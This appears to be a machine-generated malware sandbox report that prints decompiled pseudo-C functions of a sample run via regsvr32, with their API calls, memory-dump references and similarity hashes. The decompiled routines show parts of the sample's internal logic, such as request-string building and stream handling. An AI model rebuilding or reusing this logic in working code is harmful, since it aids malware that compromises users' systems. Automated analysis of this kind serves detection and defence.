						_pop(_t33);
						__imp__(_t40, _a4);
						_t19 = E007A1AF1(_t33, _t34, _t40, _a8); // executed
						_t36 = _t19;
						E007A2A03(_t40);
						_t42 = E007A332F(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E007A2A03(_t36);
							_t36 = _t42;
						}
						_t43 = E007A4138(_t36, _t33);
						if(_t43 != 0) {
							E007A2A03(_t36);
							_t36 = _t43;
						}
					}
					E007A2A03(_t28);
				}
				return _t36;
			}

0x007a5ae3
0x007a5ae6
0x007a5ae7
0x007a5aee
0x007a5af5
0x007a5afc
0x007a5b00
0x007a5b07
0x007a5b0e
0x007a5b13
0x007a5b1b
0x007a5b25
0x007a5b29
0x007a5b2d
0x007a5b33
0x007a5b38
0x007a5b42
0x007a5b48
0x007a5b4a
0x007a5b61
0x007a5b65
0x007a5b68
0x007a5b6d
0x007a5b6d
0x007a5b76
0x007a5b7a
0x007a5b7d
0x007a5b82
0x007a5b82
0x007a5b7a
0x007a5b85
0x007a5b8a
0x007a5b90

APIs

Part of subcall function 007A47BA: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,007A5AFC,253D7325,00000000,00000000,?,00000000,007A6301), ref: 007A4821
Part of subcall function 007A47BA: sprintf.NTDLL ref: 007A4842

lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,00000000,007A6301,00000000,05299630), ref: 007A5B0E
lstrlen.KERNEL32(00000000,?,00000000,007A6301,00000000,05299630), ref: 007A5B16

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

strcpy.NTDLL ref: 007A5B2D
lstrcat.KERNEL32(00000000,00000000), ref: 007A5B38

Part of subcall function 007A1AF1: lstrlen.KERNEL32(00000000,00000000,007A6301,00000000,?,007A5B47,00000000,007A6301,?,00000000,007A6301,00000000,05299630), ref: 007A1B02

Part of subcall function 007A2A03: RtlFreeHeap.NTDLL(00000000,00000000,007A4072,00000000,?,?,00000000,?,?,?,?,?,?,007A44AE,00000000), ref: 007A2A0F

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,007A6301,?,00000000,007A6301,00000000,05299630), ref: 007A5B55

Part of subcall function 007A332F: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,007A5B61,00000000,?,00000000,007A6301,00000000,05299630), ref: 007A3339
Part of subcall function 007A332F: _snprintf.NTDLL ref: 007A3397

Strings

=, xrefs: 007A5B4F

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 2e76daa2041aa4dfc02dbc73df9f0d35dd09328f077cab8f82d95ab7f107d01c
Instruction ID: 3f5bd5ee4c1806cb587876e379addbd35b013367f0740587944f3774eb81dfc5
Opcode Fuzzy Hash: 2e76daa2041aa4dfc02dbc73df9f0d35dd09328f077cab8f82d95ab7f107d01c
Instruction Fuzzy Hash: 0011A373905525BB46127B789C89CAF36AD9FC77613098315F9049B102CF7CCE0287E5

Uniqueness

Uniqueness Score: -1.00%

Function 007A1671, Relevance: 9.2, APIs: 6, Instructions: 152
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32(00000000), ref: 007A16B2
IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,00000000), ref: 007A1734
StrStrIW.SHLWAPI(00000000,006E0069), ref: 007A1773
SysFreeString.OLEAUT32(00000000), ref: 007A1795

Part of subcall function 007A13B4: SysAllocString.OLEAUT32(007A92D0), ref: 007A1404

SafeArrayDestroy.OLEAUT32(?), ref: 007A17E9
SysFreeString.OLEAUT32(?), ref: 007A17F7

Part of subcall function 007A5872: Sleep.KERNELBASE(000001F4), ref: 007A58BA

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
String ID:
API String ID: 2118684380-0
Opcode ID: e4b898ea2f0fc6295560d261e0bebbfb80025a14d8c5065ff7a5bf27253c04f6
Instruction ID: 9a3936a3739458c190b644d22f783e81b83eb5f82764576e39242e378d412419
Opcode Fuzzy Hash: e4b898ea2f0fc6295560d261e0bebbfb80025a14d8c5065ff7a5bf27253c04f6
Instruction Fuzzy Hash: C4510E76900209EFDB01DFA4C8888AEB7B6FFC9350F548968E505EB220D739AD45CF51

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DB9D1, Relevance: 7.6, APIs: 5, Instructions: 87
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

dllmain_raw.LIBCMT ref: 6D4DBA0E
dllmain_crt_dispatch.LIBCMT ref: 6D4DBA25
dllmain_raw.LIBCMT ref: 6D4DBA6D
dllmain_crt_dispatch.LIBCMT ref: 6D4DBA80
dllmain_raw.LIBCMT ref: 6D4DBA93

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 6f2f5998ca6564cf7fdaa765ff7dcbb046bd2065d2ceafd773fd41370acc6677
Instruction ID: db0f3f3ef5772fe3921961364e234be5df0354b2bc8db68b6e23fb630a31b760
Opcode Fuzzy Hash: 6f2f5998ca6564cf7fdaa765ff7dcbb046bd2065d2ceafd773fd41370acc6677
Instruction Fuzzy Hash: 59217A72D0866AAFCBA28E55CC60E7F3A79EF85A94F124159F91867310D7308D028BE0

Uniqueness

Uniqueness Score: -1.00%

Function 007A467C, Relevance: 6.1, APIs: 4, Instructions: 108
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 61%

			E007A467C(void* __eax) {
				long _v8;
				char _v12;
				char _v16;
				intOrPtr _v20;
				void* _v24;
				void* __esi;
				char* _t40;
				long _t41;
				void* _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				char _t48;
				char* _t53;
				long _t54;
				intOrPtr* _t55;
				void* _t64;

				_t64 = __eax;
				_t40 =  &_v12;
				_v8 = 0;
				_v16 = 0;
				__imp__( *((intOrPtr*)(__eax + 0x18)), _t40);
				if(_t40 == 0) {
					_t41 = GetLastError();
					_v8 = _t41;
					if(_t41 != 0x2efe) {
						L26:
						return _v8;
					}
					_v8 = 0;
					L25:
					 *((intOrPtr*)(_t64 + 0x30)) = 0;
					goto L26;
				}
				if(_v12 == 0) {
					goto L25;
				}
				_t44 =  *0x7aa148(0, 1,  &_v24); // executed
				if(_t44 != 0) {
					_v8 = 8;
					goto L26;
				}
				_t45 = E007A5C4E(0x1000);
				_v20 = _t45;
				if(_t45 == 0) {
					_v8 = 8;
					L21:
					_t46 = _v24;
					 *((intOrPtr*)( *_t46 + 8))(_t46);
					goto L26;
				} else {
					goto L4;
				}
				do {
					while(1) {
						L4:
						_t48 = _v12;
						if(_t48 >= 0x1000) {
							_t48 = 0x1000;
						}
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _v20, _t48,  &_v16);
						if(_t48 == 0) {
							break;
						}
						_t55 = _v24;
						 *((intOrPtr*)( *_t55 + 0x10))(_t55, _v20, _v16, 0);
						_t17 =  &_v12;
						 *_t17 = _v12 - _v16;
						if( *_t17 != 0) {
							continue;
						}
						L10:
						if(WaitForSingleObject( *0x7aa2c4, 0) != 0x102) {
							_v8 = 0x102;
							L18:
							E007A2A03(_v20);
							if(_v8 == 0) {
								_v8 = E007A6589(_v24, _t64);
							}
							goto L21;
						}
						_t53 =  &_v12;
						__imp__( *((intOrPtr*)(_t64 + 0x18)), _t53); // executed
						if(_t53 != 0) {
							goto L15;
						}
						_t54 = GetLastError();
						_v8 = _t54;
						if(_t54 != 0x2f78 || _v12 != 0) {
							goto L18;
						} else {
							_v8 = 0;
							goto L15;
						}
					}
					_v8 = GetLastError();
					goto L10;
					L15:
				} while (_v12 != 0);
				goto L18;
			}

0x007a4684
0x007a4687
0x007a4690
0x007a4693
0x007a4696
0x007a469e
0x007a479c
0x007a47a7
0x007a47aa
0x007a47b2
0x007a47b9
0x007a47b9
0x007a47ac
0x007a47af
0x007a47af
0x00000000
0x007a47af
0x007a46a7
0x00000000
0x00000000
0x007a46b4
0x007a46bc
0x007a4793
0x00000000
0x007a4793
0x007a46c8
0x007a46cf
0x007a46d2
0x007a4781
0x007a4788
0x007a4788
0x007a478e
0x00000000
0x00000000
0x00000000
0x00000000
0x007a46d8
0x007a46d8
0x007a46d8
0x007a46d8
0x007a46dd
0x007a46df
0x007a46df
0x007a46ec
0x007a46f4
0x00000000
0x00000000
0x007a46f6
0x007a4703
0x007a4709
0x007a4709
0x007a470c
0x00000000
0x00000000
0x007a4719
0x007a472d
0x007a4763
0x007a4766
0x007a4769
0x007a4771
0x007a477c
0x007a477c
0x00000000
0x007a4771
0x007a472f
0x007a4736
0x007a473e
0x00000000
0x00000000
0x007a4740
0x007a474b
0x007a474e
0x00000000
0x007a4755
0x007a4755
0x00000000
0x007a4755
0x007a474e
0x007a4716
0x00000000
0x007a4758
0x007a4758
0x00000000

APIs

GetLastError.KERNEL32 ref: 007A479C

Part of subcall function 007A5C4E: RtlAllocateHeap.NTDLL(00000000,00000000,007A3FAA), ref: 007A5C5A

GetLastError.KERNEL32 ref: 007A4710
WaitForSingleObject.KERNEL32(00000000), ref: 007A4720
GetLastError.KERNEL32 ref: 007A4740

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: ErrorLast$AllocateHeapObjectSingleWait
String ID:
API String ID: 35602742-0
Opcode ID: 654e05c5a541527de413d6b433b4f66104b99d08917cd643f7f68986b9f04251
Instruction ID: 90b6f17f57ca508f61acb24da461a0cd8508f58bf8ae4915c7929a56ba651fe6
Opcode Fuzzy Hash: 654e05c5a541527de413d6b433b4f66104b99d08917cd643f7f68986b9f04251
Instruction Fuzzy Hash: 64415AB4901249EFCF10DFA4C9889AEBBB9FFC6341F204669E502E6150D77A9E50DB11

Uniqueness

Uniqueness Score: -1.00%

Function 007A344C, Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(80000002), ref: 007A34A3
SysAllocString.OLEAUT32(007A20DE), ref: 007A34E6
SysFreeString.OLEAUT32(00000000), ref: 007A34FA
SysFreeString.OLEAUT32(00000000), ref: 007A3508

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: 71e42700f5eea90311a6b75f7974023e07f4e8e157d3a010a0a92983f0d84128
Instruction ID: ca9f33d2a477ecd061601c567304050fb59ac78128ef1a2df9426e85000922c3
Opcode Fuzzy Hash: 71e42700f5eea90311a6b75f7974023e07f4e8e157d3a010a0a92983f0d84128
Instruction Fuzzy Hash: 8C313E72900109EFCB05DF9CD8C48AE7BB5FF8A340B20812EF5069B210E7399A55CF65

Uniqueness

Uniqueness Score: -1.00%

Function 007A5988, Relevance: 6.1, APIs: 4, Instructions: 76
sleepstringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E007A5988(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E007A5C4E(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}

0x007a5994
0x007a5998
0x007a5999
0x007a599a
0x007a599c
0x007a599e
0x007a59a3
0x007a59a6
0x007a5a3d
0x007a5a44
0x007a5a44
0x007a59af
0x007a59b6
0x007a59c6
0x007a59c6
0x007a59cc
0x007a59ce
0x007a59d3
0x007a59dc
0x007a59e4
0x007a59e7
0x007a59f2
0x007a59f6
0x007a59f8
0x007a59f9
0x007a5a02
0x007a5a06
0x007a5a17
0x007a5a08
0x007a5a0d
0x007a5a12
0x007a5a21
0x007a5a21
0x007a59f6
0x007a5a27
0x007a5a2d
0x007a5a2d
0x007a5a36
0x007a5a3b
0x007a5a3b
0x00000000

APIs

Sleep.KERNEL32(000000C8), ref: 007A59B6
lstrlenW.KERNEL32(?), ref: 007A59EC
memcpy.NTDLL(00000000,?,00000000,00000000), ref: 007A5A0D
SysFreeString.OLEAUT32(?), ref: 007A5A21

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: FreeSleepStringlstrlenmemcpy
String ID:
API String ID: 1198164300-0
Opcode ID: bb52e85d9024f679da199db296d91fbee2ea9de215459a94bfcf2cfa675cb365
Instruction ID: 587c1ae0e874c572d4da224ea85ba47b01dcc1f416b0d2aaee7f24a943041df5
Opcode Fuzzy Hash: bb52e85d9024f679da199db296d91fbee2ea9de215459a94bfcf2cfa675cb365
Instruction Fuzzy Hash: 5B214475A00609EFCB10DFA8C88899EBBB8FF8A354F108269E945E7210E734DA01CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6D4D7CE0, Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 205COMMONLIBRARYCODE

Download Yara Rule

APIs

VirtualProtectEx.KERNELBASE(000000FF,?,0000416C,00000040,?), ref: 6D4D7E3D

Strings

@, xrefs: 6D4D7CF7
/, xrefs: 6D4D7CE7

Memory Dump Source

Source File: 00000002.00000002.1098034914.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6d4ae000_regsvr32.jbxd

Similarity

API ID: ProtectVirtual
String ID: /$@
API String ID: 544645111-1264875769
Opcode ID: b4c3e638d1386b3da702d118239c8aa9e192c6ab131dfeec69b8bb4a767a6358
Instruction ID: be545fa034a88deb6dde85f956f91dd353d6ab13f640aafc6f9336b99b9925ae
Opcode Fuzzy Hash: b4c3e638d1386b3da702d118239c8aa9e192c6ab131dfeec69b8bb4a767a6358
Instruction Fuzzy Hash: 0EA18B79904154DFDF08CF69C570BA8BBB1BB86302F0EC16EE88587A99E7345A84DF50

Uniqueness

Uniqueness Score: -1.00%

Function 007A7471, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 112
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E007A7471(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
				void* _v8;
				void* __esi;
				intOrPtr* _t35;
				void* _t40;
				intOrPtr* _t41;
				intOrPtr* _t43;
				intOrPtr* _t45;
				intOrPtr* _t50;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t61;
				intOrPtr* _t65;
				intOrPtr _t68;
				void* _t72;
				void* _t75;
				void* _t76;

				_t55 = _a4;
				_t35 =  *((intOrPtr*)(_t55 + 4));
				_a4 = 0;
				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
				if(_t76 < 0) {
					L18:
					return _t76;
				}
				_t40 = E007A344C(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
				_t76 = _t40;
				if(_t76 >= 0) {
					_t61 = _a28;
					if(_t61 != 0 &&  *_t61 != 0) {
						_t52 = _v8;
						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
					}
					if(_t76 >= 0) {
						_t43 =  *_t55;
						_t68 =  *0x7aa2d0; // 0x4aed5a8
						_t20 = _t68 + 0x7ab1fc; // 0x740053
						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
						if(_t76 >= 0) {
							_t76 = E007A2986(_a4);
							if(_t76 >= 0) {
								_t65 = _a28;
								if(_t65 != 0 &&  *_t65 == 0) {
									_t50 = _a4;
									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
								}
							}
						}
						_t45 = _a4;
						if(_t45 != 0) {
							 *((intOrPtr*)( *_t45 + 8))(_t45);
						}
						_t57 = __imp__#6;
						if(_a20 != 0) {
							 *_t57(_a20);
						}
						if(_a12 != 0) {
							 *_t57(_a12);
						}
					}
				}
				_t41 = _v8;
				 *((intOrPtr*)( *_t41 + 8))(_t41);
				goto L18;
			}

0x007a7477
0x007a747a
0x007a748a
0x007a7493
0x007a7497
0x007a7565
0x007a756b
0x007a756b
0x007a74b1
0x007a74b6
0x007a74ba
0x007a74c0
0x007a74c5
0x007a74cc
0x007a74db
0x007a74db
0x007a74df
0x007a74e1
0x007a74ed
0x007a74f8
0x007a7503
0x007a7507
0x007a7511
0x007a7515
0x007a7517
0x007a751c
0x007a7523
0x007a7533
0x007a7533
0x007a751c
0x007a7515
0x007a7535
0x007a753a
0x007a753f
0x007a753f
0x007a7545
0x007a754b
0x007a7550
0x007a7550
0x007a7555
0x007a755a
0x007a755a
0x007a7555
0x007a74df
0x007a755c
0x007a7562
0x00000000

APIs

Part of subcall function 007A344C: SysAllocString.OLEAUT32(80000002), ref: 007A34A3
Part of subcall function 007A344C: SysFreeString.OLEAUT32(00000000), ref: 007A3508

SysFreeString.OLEAUT32(?), ref: 007A7550
SysFreeString.OLEAUT32(007A20DE), ref: 007A755A

Strings

-tz, xrefs: 007A747D

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: String$Free$Alloc
String ID: -tz
API String ID: 986138563-878127217
Opcode ID: b3c8432ee920f7b10d9ca0a471433fa42140f42587a63e386587af1fa9f05ba0
Instruction ID: b1ad5a0b44842436b553405502ee3053384e95d04e201dee2c31d59bc89b94dc
Opcode Fuzzy Hash: b3c8432ee920f7b10d9ca0a471433fa42140f42587a63e386587af1fa9f05ba0
Instruction Fuzzy Hash: 42311772900119EFCB19DF68CC88C9BBB79FBCA7407148658F9159B221E635ED61CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 007A4A3C, Relevance: 4.6, APIs: 3, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E007A4A3C(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t55;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E007A4380(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x7aa2d0; // 0x4aed5a8
				_t4 = _t24 + 0x7abd90; // 0x5299338
				_t5 = _t24 + 0x7abd38; // 0x4f0053
				_t26 = E007A30AD( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x7aa2d0; // 0x4aed5a8
						_t11 = _t32 + 0x7abd84; // 0x529932c
						_t48 = _t11;
						_t12 = _t32 + 0x7abd38; // 0x4f0053
						_t55 = E007A4DC8(_t11, _t12, _t11);
						_t59 = _t55;
						if(_t55 != 0) {
							_t35 =  *0x7aa2d0; // 0x4aed5a8
							_t13 = _t35 + 0x7abdce; // 0x30314549
							if(E007A5EC8(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
								_t61 =  *0x7aa2b4 - 6;
								if( *0x7aa2b4 <= 6) {
									_t42 =  *0x7aa2d0; // 0x4aed5a8
									_t15 = _t42 + 0x7abbda; // 0x52384549
									E007A5EC8(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
								}
							}
							_t38 =  *0x7aa2d0; // 0x4aed5a8
							_t17 = _t38 + 0x7abdc8; // 0x5299370
							_t18 = _t38 + 0x7abda0; // 0x680043
							_t45 = E007A33B7(_v8, 0x80000001, _t55, _t18, _t17);
							HeapFree( *0x7aa290, 0, _t55);
						}
					}
					HeapFree( *0x7aa290, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E007A3EFA(_t54);
				}
				return _t45;
			}

0x007a4a3c
0x007a4a4c
0x007a4a4f
0x007a4a56
0x007a4a58
0x007a4a58
0x007a4a5b
0x007a4a60
0x007a4a67
0x007a4a74
0x007a4a79
0x007a4a7d
0x007a4a8b
0x007a4a99
0x007a4a9d
0x007a4b2e
0x007a4b2e
0x007a4aa3
0x007a4aa3
0x007a4aa8
0x007a4aa8
0x007a4aaf
0x007a4abb
0x007a4abd
0x007a4abf
0x007a4ac1
0x007a4ac8
0x007a4ada
0x007a4adc
0x007a4ae3
0x007a4ae5
0x007a4aec
0x007a4af7
0x007a4af7
0x007a4ae3
0x007a4afc
0x007a4b01
0x007a4b08
0x007a4b26
0x007a4b28
0x007a4b28
0x007a4abf
0x007a4b3a
0x007a4b3a
0x007a4b3c
0x007a4b41
0x007a4b43
0x007a4b43
0x007a4b4e

APIs

StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05299338,00000000,?,73BCF710,00000000,73BCF730), ref: 007A4A8B
HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,05299370,?,00000000,30314549,00000014,004F0053,0529932C), ref: 007A4B28
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,007A1BD5), ref: 007A4B3A

Memory Dump Source

Source File: 00000002.00000002.1093375016.00000000007A1000.00000020.00000001.sdmp, Offset: 007A0000, based on PE: true

Associated: 00000002.00000002.1093347027.00000000007A0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093436516.00000000007A9000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.1093456870.00000000007AA000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.1093479026.00000000007AC000.00000002.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7a0000_regsvr32.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 8f6a2c7dad0bac73a38b74caedf8c6284117a9142a83301a8e9a5ce5383b243a
Instruction ID: ad0ceac2af8d4f68f5645b4ba4f0e1e39f641b3e2f6bd0846d1f6cae7e8d9f53
Opcode Fuzzy Hash: 8f6a2c7dad0bac73a38b74caedf8c6284117a9142a83301a8e9a5ce5383b243a
Instruction Fuzzy Hash: CC317E72A00108FFDB11DBA4DC85EEA7BB8FFC6300F154295F605A7062D7BA9A14DB64

Uniqueness

Uniqueness Score: -1.00%

Function 007A243C, Relevance: 4.6, APIs: 3, Instructions: 82
memoryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E007A243C(intOrPtr* __eax, void* __ecx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
				void* _v8;
				char _v48;
				void* __edi;
				intOrPtr _t22;
				long _t29;
				intOrPtr _t33;
				intOrPtr* _t41;
				void* _t42;
				void* _t46;
				intOrPtr* _t47;
				void* _t48;
				intOrPtr _t50;

				_t42 = __ecx;
				_t41 = _a16;
				_t47 = __eax;
				_t22 =  *0x7aa2d0; // 0x4aed5a8
				_t2 = _t22 + 0x7ab671; // 0x657a6973
				wsprintfA( &_v48, _t2,  *__eax,  *_t41);
				if( *0x7aa2a4 >= 5) {
					_push( &_a16);
					_push( &_v8);
					_push( &_v48);
					_t29 = _a4;
					"QQSUVWh"();
					L5:
					_a4 = _t29;
					L6:
					if(_a4 != 0) {
						L9:
						 *0x7aa2a4 =  *0x7aa2a4 + 1;
						L10:
						return _a4;
					}
					_t49 = _a16;
					 *_t47 = _a16;
					_t48 = _v8;
					 *_t41 = E007A3F12(_t49, _t48); // executed
					_t33 = E007A45E6(_t46, _t48, _t49); // executed
					if(_t33 != 0) {
						 *_a8 = _t48;
						 *_a12 = _t33;
						if( *0x7aa2a4 < 5) {
							 *0x7aa2a4 =  *0x7aa2a4 & 0x00000000;
						}
						goto L10;
					}
					_a4 = 0xbf;
					E007A2813();
					RtlFreeHeap( *0x7aa290, 0, _t48); // executed
					goto L9;
				}
				_t50 =  *0x7aa390; // 0x5298d6c
				if(RtlAllocateHeap( *0x7aa290, 0, 0x800) == 0) {
					_a4 = 8;
					goto L6;
				}
				_t29 = E007A6DB7(_a4, _t42, _t46, _t50,  &_v48,  &_v8,  &_a16, _t36); // executed
				goto L5;
			}

0x007a243c
0x007a2443
0x007a244a
0x007a244e
0x007a2453
0x007a245e
0x007a246e
0x007a24b1
0x007a24b5
0x007a24b9
0x007a24ba
0x007a24bd
0x007a24c2
0x007a24c2
0x007a24c5
0x007a24c9
0x007a2503
0x007a2503
0x007a2509
0x007a2510
0x007a2510
0x007a24cb
0x007a24ce
0x007a24d0
0x007a24dd
0x007a24df
0x007a24e6
0x007a251d
0x007a2522
0x007a2524
0x007a2526
0x007a2526
0x00000000
0x007a2524
0x007a24e8
0x007a24ef
0x007a24fd
0x00000000
0x007a24fd
0x007a2470
0x007a248b
0x007a24a5
0x00000000
0x007a24a5
0x007a249e
0x00000000

APIs

wsprintfA.USER32 ref: 007A245E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 007A2483

Part of subcall function 007A6DB7: GetTickCount.KERNEL32 ref: 007A6DCE
Part of subcall function 007A6DB7: wsprintfA.USER32 ref: 007A6E1B
Part of subcall function 007A6DB7: wsprintfA.USER32 ref: 007A6E38
Part of subcall function 007A6DB7: wsprintfA.USER32 ref: 007A6E58
Part of subcall function 007A6DB7: wsprintfA.USER32 ref: 007A6E76
Part of subcall function 007A6DB7: wsprintfA.USER32 ref: 007A6E99
